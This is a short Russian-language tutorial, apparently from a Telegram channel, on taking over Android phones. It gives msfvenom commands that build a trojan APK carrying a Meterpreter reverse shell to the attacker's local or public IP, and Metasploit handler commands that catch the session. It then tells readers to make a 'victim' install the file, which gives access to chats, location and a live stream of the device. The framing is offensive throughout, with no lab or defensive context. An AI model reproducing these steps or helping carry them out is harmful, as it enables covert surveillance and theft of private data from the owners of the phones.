Взлом Android.
@Garant_CopyВсем привет. Не будет долгих отступлений, сразу скажу, что в этой статье будет рассмотрен взлом Android устройств. Погнали.
Что нам нужно?
1. Терминал Kali Linux.
2. Прямые ручки.
Начнем.
Для начала стоит объяснить суть атаки:
- Первым делом мы генерируем наш троян(по-другому пейлоад или полезная нагрузка)
- Второе. Мы запустим metasploit и запустим своеобразный "слушатель", с помощью которого мы подключимся к нашей полезной нагрузке(сгенерированному трояну).
- Третье. Жертва должна будет запустить наш .apk файл, только после его установки и запуска у нас вылезет сессия meterpreter.
Если вы не знаете, что такое meterpreter, то объясню простыми словами. Это своеобразная часть нашего трояна, дающая нам возможность управлять целью. Т.е при запуске сессии с помощью meterpreter мы сможем управлять нашей жертвой.
Первое. Генерируем payload. (полезную нагрузку, троян, называйте как хотите)
Собственно, запускаем терминал и пишем вот такую команду:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.104 LPORT=4444 R > hack.apk
Итак, давай разбираться, что это за зверь такой. Командой "msfvenom" мы показываем, что хотим сгенерировать полезную нагрузку.
После флажка "-p" у нас идёт вид полезной нагрузки. Он у нас называется "android/meterpreter/reverse_tcp".
Потом команда "LHOST", в нее мы вводим наш локальный ip'шник, который можно узнать через команду ifconfig. Ищите ваш локальный IP в строке wlan0.
Да-да, вы спросите, мол: "Получается, что мы можем взаимодействовать с нашим трояном только через локальную сеть?". Ответ, не совсем. Если вы вобьете ваш частный (локальный) IP, то, собственно, вы сможете использовать наш пейлоад(троян) только через общую WiFi сеть. Но как и всегда есть решение, а заключается оно в том, что вам просто нужно вбить вместо вашего локального IP, ваш публичный IP, который не сложно узнать на таких ресурсах как 2ip или whoer. Тогда наша команда будет выглядеть так:
msfvenom -p android/meterpreter/reverse_https LHOST=твой публичный IP LPORT=443 R > hack.apk
(Да-да, тут есть изменения, учитывайте их)
В поле "LPORT" вы прописываете порт для дальнейшего соединения, советую брать 4444. Потом идёт эта команда: "R > *путь до сохранения файла.apk*"
Второе. Подключаемся к нашей полезной нагрузке.
Итак, вводим в терминал команду msfconsole, она откроет вам metasploit.
Отлично! Вводим команду:
use exploit/multi/handler
Тут мы даём понять, что мы хотим включить наш "слушатель" для дальнейшей связи с трояном.
Теперь это:
set payload android/meterpreter/reverse_tcp
Здесь мы указываем вид нашей полезной нагрузки.
Пишем:
set LHOST *ваш частный ip*
Думаю, тут объяснять особо ничего не надо, НО если вы ввели в пейлоад ваш публичный IP, то сюда вы в ЛЮБОМ случае ставите локальный.
Затем пишем:
set LPORT *наш порт из пейлоад*
Отлично! Вводим команду exploit. Тут наш "слушатель" ждёт ответа от полезной нагрузки.
Осталось дело за малым, просто заставить жертву установить и открыть ваш файл, профит!
После того, как жертва сделала наши заветные действия, у нас должна вылезти сессия meterpreter.
Ее функции вы сможете узнать из команды "help". Да-да, дамп переписок, геолокация, стрим с устройства и это ещё не всё.
Удачных взломов, друзья.